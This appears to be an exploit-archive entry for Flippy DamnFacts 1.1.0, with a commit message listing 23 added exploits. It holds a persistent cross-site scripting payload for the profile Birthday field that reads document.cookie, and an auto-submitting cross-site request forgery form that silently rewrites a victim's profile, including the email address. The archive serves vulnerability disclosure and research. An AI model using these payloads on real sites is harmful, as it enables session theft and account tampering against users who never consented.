08c35595ed
23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
34 lines
No EOL
1.3 KiB
Text
34 lines
No EOL
1.3 KiB
Text
# Exploit Title: Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery
|
|
# Date: 2018-05-20
|
|
# Dork: N/A
|
|
# Exploit Author: borna nematzadeh (L0RD)
|
|
# Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630
|
|
# Version: 1.1.0
|
|
# Tested on: Kali linux
|
|
|
|
# POC 1 : Persistent Cross site scripting :
|
|
1) After creating an account , navigate to "Edit profile" .
|
|
2) Put this payload into the "Birthday" and save changes :
|
|
" onmouseover=alert(document.cookie) "
|
|
3) You will have an alert box in the page .
|
|
|
|
# POC 2 : Cross site request forgery :
|
|
|
|
<html>
|
|
<head>
|
|
<title>CSRF POC</title>
|
|
</head>
|
|
<body>
|
|
<form action="http://damnfacts.flippydemos.com/submit_profile.php" method="POST">
|
|
<input type="hidden" name="sex" value="Male" />
|
|
<input type="hidden" name="birthday" value="test" />
|
|
<input type="hidden" name="uEmail" value="ninjaassassinbn@yahoo.com" />
|
|
<input type="hidden" name="country" value="United States" />
|
|
<input type="hidden" name="about" value="test" />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
// profile will be updated successfully.
|
|
</script>
|
|
</body>
|
|
</html> |